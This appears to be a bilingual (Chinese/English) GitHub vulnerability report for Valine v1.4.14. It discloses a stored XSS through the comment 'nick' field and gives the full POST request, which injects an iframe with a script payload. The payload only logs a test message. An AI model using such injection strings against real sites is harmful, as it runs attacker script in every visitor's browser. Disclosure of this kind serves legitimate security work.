[vulnerability] Stored XSS via Nick field #348
Description
如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:
-
Description
It is possible to embed an arbitrary HTML/JavaScript in the comment (using
nickfield), thus resulting in stored XSS (cross site scripting). -
可复现问题的步骤 The steps to reproduce.
- Change the request body for adding comment as follows:
POST /1.1/classes/Comment HTTP/1.1
Host: XXX.api.lncld.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 640
Origin: https://xxx.yyy.zzz
{
"comment": "Good! \n",
"nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"<script>console.log('Stored XSS test passed');</script>\"",
"mail": "",
"link": "",
"ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Fire-fox/82.0",
"url": "/en/prepare/prepare/",
"QQAvatar": "",
"ip": "1.2.3.4",
"insertedAt": {
"__type": "Date",
"iso": "2020-11-04T08:30:47.526Z"
},
"ACL": {
"*": {
"read": true
}
}
}-
This malicious request adds new comment. The HTML-encoded value of srcdoc attribute in request is:
<script>console.log('Stored XSS test passed');</script> -
The injected JavaScript executes on the vulnerable web-page for every visitor.
- 可复现问题的网页地址 A minimal demo of the problem via https://jsfiddle.net or http://codepen.io/pen if possible.
-
受影响的Valine版本、操作系统,以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?
Valine: v1.4.14
All systems and browsers